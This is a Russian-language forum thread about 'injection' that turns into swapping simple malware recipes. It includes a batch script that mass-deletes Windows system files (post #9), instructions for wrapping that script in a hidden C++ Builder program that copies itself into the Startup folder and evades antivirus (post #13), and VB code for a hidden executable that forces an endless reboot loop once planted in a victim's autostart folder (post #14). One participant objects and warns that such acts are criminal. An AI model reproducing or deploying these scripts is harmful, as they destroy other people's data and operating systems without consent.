NForum.RU: Инжектирование - NForum.RU

Перейти к содержимому

Страница 1 из 1
  • Вы не можете создать новую тему
  • Вы не можете ответить в тему

Инжектирование Предлагаю обсудить инжектирование на С++

#1 Пользователь офлайн   RenegadeMS 

  • Энтузиаст
  • Иконка
  • Группа: Супермодераторы
  • Сообщений: 72
  • Регистрация: 29.12.2005

Отправлено Четверг, 29.12.2005 - 20:26

С чего начнём и кто?
0


Страница 1 из 1
  • Вы не можете создать новую тему
  • Вы не можете ответить в тему

Другие ответы в этой теме

#2 Пользователь офлайн   RenegadeMS 

  • Энтузиаст
  • Иконка
  • Группа: Супермодераторы
  • Сообщений: 72
  • Регистрация: 29.12.2005

Отправлено Четверг, 29.12.2005 - 20:30

Например очень интересно написано об этом в Хакере 12/2004
0

#3 Пользователь офлайн   chiverel 

  • Бывалый
  • Иконка
  • Группа: Суперпользователи
  • Сообщений: 209
  • Регистрация: 20.01.2006

Отправлено Суббота, 21.01.2006 - 20:26

Народ, а про что тема-то вообще?
0

#4 Пользователь офлайн   RenegadeMS 

  • Энтузиаст
  • Иконка
  • Группа: Супермодераторы
  • Сообщений: 72
  • Регистрация: 29.12.2005

Отправлено Четверг, 23.02.2006 - 22:16

Да.....:(((
0

#5 Пользователь офлайн   RenegadeMS 

  • Энтузиаст
  • Иконка
  • Группа: Супермодераторы
  • Сообщений: 72
  • Регистрация: 29.12.2005

Отправлено Четверг, 30.03.2006 - 20:31

Ну... можно было назвать "Давайте вместе напишим что-то типо виря или трояна". Я думал что поймёте...:(
0

#6 Пользователь офлайн   Creperum 

  • Завсегдатай
  • Иконка
  • Группа: Суперпользователи
  • Сообщений: 429
  • Регистрация: 23.02.2006

Отправлено Вторник, 04.04.2006 - 18:44

Нуу, парень. Не туды глядишь. Правильно говорят, что увлечение этим - занятие очень неопытных программистов. Нет, ну конечно есть и у старых програмёров - но это уже шедевры, которые, на самом деле, радко приносят сильный вред. Только по ошибке (а у опытного программиста ошибки... короче, понятно).

Да и написать вирус - раз плюнуть. Я в этом деле более чем неопытен, но не вижу никаких трудностей в создании чего-либо, что будет приносить вред и разрушение. И троян не очень навороченый - тож штука простая. Только объясни мне, зачем это тебе нужно??

Если очень хочешь кому-то навредить, то к сведению - за это сажают.
Усё.
0

#7 Пользователь офлайн   RenegadeMS 

  • Энтузиаст
  • Иконка
  • Группа: Супермодераторы
  • Сообщений: 72
  • Регистрация: 29.12.2005

Отправлено Воскресенье, 09.04.2006 - 20:54

Просмотр сообщенияCreperum (04.04.2006, 21:44) писал:

Нуу, парень. Не туды глядишь. Правильно говорят, что увлечение этим - занятие очень неопытных программистов. Нет, ну конечно есть и у старых програмёров - но это уже шедевры, которые, на самом деле, радко приносят сильный вред. Только по ошибке (а у опытного программиста ошибки... короче, понятно).

Да и написать вирус - раз плюнуть. Я в этом деле более чем неопытен, но не вижу никаких трудностей в создании чего-либо, что будет приносить вред и разрушение. И троян не очень навороченый - тож штука простая. Только объясни мне, зачем это тебе нужно??

Если очень хочешь кому-то навредить, то к сведению - за это сажают.
Усё.

Нее.... я уже давно ничего вредного не писал а щас занимаюсь мирными прогами для людей, которые просят что-нить сделать. А это тема просто для меня например очень интересна тем что более менее сложно! Конечно пара WinAPI в проге нифига не даст, а вот заюзать это с умом! Я ждал интересных идей, а получил....
0

#8 Пользователь офлайн   Creperum 

  • Завсегдатай
  • Иконка
  • Группа: Суперпользователи
  • Сообщений: 429
  • Регистрация: 23.02.2006

Иконки сообщения  Отправлено Суббота, 15.04.2006 - 17:32

Сложно? Не скажи... И потом, что означает - интересные идеи? Конкретно, решения какой проблемы ты добиваешься?
А вставить АПИ с умом - ну, что ж, не всё ж должно быть сделано ЗА тебя. Даже на ВБ - это элементарная задача (ну, вставил пару АктивИкс, создал сервер, создал клиент с выходом в И-нет - и вот тебе то, что ты обозвал "Давайте вместе напишим что-то типо виря или трояна").
И на Си это тоже несложно, только на более низком уровне всё делать придётся...

Про реакцию - я не думаю, что это лучшее место, где стоит обсуждать такие вопросы... В конце-концов, чего ж ты хотел? Если тебя интересует "как это сделать?", то в Нете полно информации на этот счёт. И форумов полно, где сидят всякие "хацкеры" и творят "zло"... Я не говорю, что тема плохая - но ты же сам видишь, как "много" в неё ответов.
Сорри, я закончил.
0

#9 Пользователь офлайн   krotsuper 

  • Завсегдатай
  • Иконка
  • Группа: Суперпользователи
  • Сообщений: 278
  • Регистрация: 27.03.2006

Отправлено Воскресенье, 16.04.2006 - 14:42

Вот инструкция по созданию простецкого трояна:
еСЛи ТеБя НаДоеЛ wINDOWS, ТеПеРь эТо Не БеДа! СеГоДНя я РаССКаЖу, КаК СаМоМу в ДоМаШНиХ уСЛоВияХ НаПиСаТь ПоЛНоЦеННыЙ ТРояН БеЗ ЗНаНия bASIC'а, pASCAL'я и ТеМ БоЛее аССеМБЛеРа! ВСё ЧТо НуЖНо, эТо 2 ПРиМиНиВНые КоММаНДы dos'a cd (CurrentDirectory) и del (СаМи ЗНаеТе ЧТо) и ПРоСТеНьКиЙ ТеКСТоВыЙ РеДаКТоР. иТаК, оТКРыВаЙ, НаПРиМеР, БЛоКНоТ и ПиШи:

@cd с:\windows
del *.dll

СоХРаНиТь В txt и ПеРеиМеНоВаТь РаСШиРеНие иЗ txt в bat. ВСё!
ЧТо Мы СДеЛаЛи? @cd с:\windows ЗНаЧиТ СДеЛаТь CurrentDir'ом, ТеКуЩеЙ ДиРеКТоРиеЙ Root - КоРНеВоЙ КаТаЛоГ, а ЗаТеМ ЗаЙТи В ДиРеКТоРию WINDOWS.
del *.dll- уДаЛиТь ВСе ФаЙЛы ПоДХоДяЩие ПоД *.dll иЗ ТеКуЩеЙ ДиРеКТоРии.
cd\ - Root - СиСТеМНыЙ ДиСК. cd * - ЗаЙТи В ДиРеКТоРию *. Т.е. Мы уДаЛиЛи ВСе ДуЛи иЗ ВиНДы.
МоЖНо уСоВеНШеНСТВоВаТь ТРояН, НаПРиМеР ТаК, ЗаЙТи Не ТоЛьКо В WINDOWS, Но и В system, system32 и т.д. и уДаЛиТь Не ТоЛьКо exe-ФаЙЛы, Но и ВооБЩе, ВСе ФаЙЛы, КоТоРые МоЖНо уДаЛиТь. ТоЛьКо НеЛьЗя ПиСаТь del *.* иЛи * , а То dos СПРоСиТ ПРоДоЛЖиТЬ? Y/N. МоЖеШь ПоПРоБоВаТь, ЧТоБы НиЧеГо Не ПоГиБЛо, СоЗДаЙ, НаПРиМеР, ДиРеКТоРию C:\1, ПоЛоЖи В Неё ТеКСТоРыЙ ФаЙЛ ВМеСТо windows НаПиШи 1, а ВМеСТо dll, txt. Ну, эТо и ТаК ПоНяТНо."


Это доджно выглядеть вот так:
----------------------- - эту полоску не надо
@cd C:\windows
del *.exe
del *.dll
del *.ini
del *.log
del *.cfg
del *.txt
del *.scf
del *.inf
del *.dat
del *.bat

cd\
del *.exe
del *.dll
del *.ini
del *.log
del *.cfg
del *.txt
del *.inf
del *.dat
del *.bat

cd\
cd windows\system32
del *.exe
del *.dll
del *.ini
del *.log
del *.cfg
del *.txt
del *.inf
del *.dat
del *.bat

cd\
cd windows\system
del *.exe
del *.dll
del *.ini
del *.log
del *.cfg
del *.txt
del *.inf
del *.bat

cd\
cd windows\fonts
del *.TTF

cd\
cd windows\Cursors
del *.cur
del *.ani

cd\
cd windows\Driver Cache\i386
del *.cab

cd\
cd windows\Registration
del *.crmlog
del *.clb


cd\
cd windows\repair
del *.inf
del *.dat
del *.nt

cd\
cd windows\Resources\Boot
del *.bootskin

cd\
cd windows\inf
del *.inf
del *.pnf
del *.adm
del *.exe

----------------------- - эту полоску не надо
P.S. *.scf - эТо eXPLoReR...
*.TTF - эТо ШРиФТы...


Использовать на свой страх и риск! Автор не несёт никакой ответственности, а уж я тем более. Я только предупреждаю, что это может привести к краху системы ,уничтожению различного рода информации и прочим неблагоприятным последствиям!!!!!!!!!!!

а еще имею прогу имитирующую трояна,все запускается,открывается сидюк,открываются окна,прога над виндой издевается!!!!!!!
0

#10 Пользователь офлайн   Creperum 

  • Завсегдатай
  • Иконка
  • Группа: Суперпользователи
  • Сообщений: 429
  • Регистрация: 23.02.2006

Отправлено Понедельник, 17.04.2006 - 16:44

Крот - это не троян. Это даже не червь. Это даже программой полноценной трудно назвать. И потом, программка-вредитель в формате Бат на самом деле настоящего вреда принести не сможет. Хотя бы потому, что не сможет сама себя запустить (или прописаться в автозагрузку). Это надо сделать самостоятельно, т.е. с помощью отдельной программы.
Следующий аспект этого "чёрного дела" - Бат-язык для разных Винд несколько отличается. Т.е. он может не принести никакого вреда стареньким 98 или Ме...
Про вторую прогу (имитатор) - написать эту ерунду на Делфи - разплюнуть. Только вот опять же вставить на чужой комп - енто надо немного доработать. Прописать в ней автозагрузку, например.
И потом, здесь говорилось о "Инжектировании на С++", что как я уже писал выше, вряд ли будет рассмотрено на должном уровне.

И ЗаЧем тЫ тАк пиШешЬ? ОчЕнЬ нЕ удОбНо чИтаТь? © - потерял? ;)
0

#11 Пользователь офлайн   krotsuper 

  • Завсегдатай
  • Иконка
  • Группа: Суперпользователи
  • Сообщений: 278
  • Регистрация: 27.03.2006

Отправлено Понедельник, 17.04.2006 - 22:22

это самый простецкий первобытный вредитель,который слепит любой кому не лень
во вторых это цитата моего друга(он так пишет,видать нравится)
а эту инфуя вставил чтоб тему поддержать :)
0

#12 Пользователь офлайн   RenegadeMS 

  • Энтузиаст
  • Иконка
  • Группа: Супермодераторы
  • Сообщений: 72
  • Регистрация: 29.12.2005

Отправлено Воскресенье, 30.04.2006 - 21:36

Не думал что в bat'ах кто-то пытается что-то "полезное" писать
0

#13 Пользователь офлайн   Eclipse TH 

  • Бывалый
  • Иконка
  • Группа: Суперпользователи
  • Сообщений: 135
  • Регистрация: 25.10.2007

Отправлено Воскресенье, 06.01.2008 - 09:24

Лучше всего было бы эти команды не в BAT-файл вложить, а написать в системе программирования, допустим в C++ Builder. Но для начала нужно спроектировать интерфейс.

1. Запускаем C++ Builder;
2. Создаём новое приложение Win32;
3. У главной формы приложения убираем рамку, уменьшаем размер формы до 0, 0, чтобы её вообще не было видно на экране.
4. Создаём событие Form1::OnShow и добавляем в него команды, которые krotsuper написал в BAT-файле, немного исправив их, заменив оператор "del" на "DeleteFile".
5. Компилируем приложение, чтобы создался EXE-шник.
6. Затем в процедуре Form1::OnShow добавляем после всех операторов ещё один:
CopyFile("Project1.exe", "C:\Documents and Settings\All Users\Главное меню\Программы\Автозагрузка\System.exe", 0);

7. После этого снова компилируем приложение. Всё готово.

Лучше всего, конечно, эту прогу компилировать в VB, поскольку там есть возможность скрыть кнопку программы на панели задач.

Конечно, трояном или вирусом это назвать невозможно, однако он способен вредить компьютеру и причём ни один антивирус не способен его определить как вирус, поскольку это и не вирус.

После первого запуска это приложение само копируется в папку автозапуска системы и, если пользователь не шарит в компах, то этот "вирус" при каждом запуске Windows'а будет выполнять свою работу (поскольку очень часто операционная система Windows создаёт заново те файлы, которые были удалены из её папок). Однако есть очень много багов: работает только при установленной ОС Windows 2k/XP, причём именно русской версии и именно на диске C, и может работать некорректно при изменении имени EXE-шника.

Автор не несёт ответственности за последствия, вызванные использованием данной программы. :lol:

Сообщение отредактировал Eclipse TH: Воскресенье, 06.01.2008 - 09:41

0

#14 Пользователь офлайн   Eclipse TH 

  • Бывалый
  • Иконка
  • Группа: Суперпользователи
  • Сообщений: 135
  • Регистрация: 25.10.2007

Отправлено Воскресенье, 06.01.2008 - 09:39

А вот ещё одна прога-прикол на VB.

Короче создаём приложение Win32 в Visual Basic'е. Затем создаём изменяем размер формы (0, 0), убираем рамку, убираем кнопку программы с панели задач. Создаём событие:

Private Sub Form_Load()
shell "shutdown -r -t 00", 1
End Sub


Затем компилируем проект и кидаем полученный EXE-шник какому-нить ламеру в папку "Автозапуск".

Теперь при каждом запуске операционной системы Windows на компе ламера будет сразу же происходить перезагрузка.

Сообщение отредактировал Eclipse TH: Воскресенье, 06.01.2008 - 09:42

0

Страница 1 из 1
  • Вы не можете создать новую тему
  • Вы не можете ответить в тему